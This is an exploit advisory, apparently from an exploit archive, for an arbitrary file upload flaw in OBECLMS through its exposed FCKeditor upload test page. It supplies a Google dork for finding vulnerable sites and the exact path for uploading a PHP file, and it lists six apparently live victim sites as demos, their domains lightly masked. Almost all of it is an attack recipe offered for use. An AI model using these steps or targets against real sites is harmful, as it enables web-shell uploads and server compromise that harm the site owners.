[+] OBECLMS (fckeditor) Arbitrary File Upload Vulnerability
[+] Exploit Title : OBECLMS (FCKEDITOR)
[+] Exploit Author : Ashiyane Digital Security Team
[+] Vendor Homepage : http://www.obeclms.com
[+] Google Dork : inurl:index.php?show_flash_subject
[+] Date: 2015-04-14
[+] Tested On : Windows 7 / Mozilla Firefox
[+] Version : All Version
[+] exploit => core_main/editor/editor/filemanager/connectors/uploadtest.html
[+] first go to => http://site.com/[path]
[+] then => http://www.site.com/[path]/core_main/editor/editor/filemanager/connectors/uploadtest.html
[+] select => Select the "File Uploader"> php ... upload to : Uploaded File URL:
[+] demos :
[+] http://sinnarin.Xsesao33.net/core_main/editor/editor/filemanager/connectors/uploadtest.html
[+] http://watponXsap.com/obeclms/core_main/editor/editor/filemanager/connectors/uploadtest.html
[+] http://krooyXim.com/core_main/editor/editor/filemanager/connectors/uploadtest.html
[+] http://kateclassrXoom.com/core_main/editor/editor/filemanager/connectors/uploadtest.html
[+] http://www.kloXngklau.net/core_main/editor/editor/filemanager/connectors/uploadtest.html
[+] http://iepchinXorot.com/core_main/editor/editor/filemanager/connectors/uploadtest.html
[+][+][+][+][+][+][+][+][+][+][+]
[+]Discovered By : Cyb3r_Dr4in[+]
[+][+][+][+][+][+][+][+][+][+][+]